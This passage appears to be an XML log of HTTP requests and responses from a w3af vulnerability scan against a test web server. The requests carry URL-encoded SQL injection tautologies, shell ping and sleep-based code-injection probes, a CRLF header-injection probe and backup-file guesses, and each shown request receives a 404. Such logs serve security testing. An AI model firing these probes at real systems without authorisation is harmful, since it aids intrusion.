                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="445">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="448">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="449">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+OR+%2229%22%3D%2229 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 29%22+OR+%2229%22%3D%2229 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='29%22+OR+%2229%22%3D%2229'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="450">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="453">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="454">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="456">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="460">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="463">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="465">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="468">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+AND+%2229%22%3D%2230 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 29%22+AND+%2229%22%3D%2230 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='29%22+AND+%2229%22%3D%2230'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="479">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%27+OR+%2770%27%3D%2770 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%27+OR+%2770%27%3D%2770 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%27+OR+%2770%27%3D%2770'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="489">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%27+AND+%2770%27%3D%2771 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%27+AND+%2770%27%3D%2771 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%27+AND+%2770%27%3D%2771'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="504">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="509">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="514">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42%27+OR+%2742%27%3D%2742 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42%27+OR+%2742%27%3D%2742 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42%27+OR+%2742%27%3D%2742'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="522">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42%27+AND+%2742%27%3D%2743 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42%27+AND+%2742%27%3D%2743 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42%27+AND+%2742%27%3D%2743'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="525">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="527">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="534">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70+OR+70%3D70+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70+OR+70%3D70+ has not been found, we
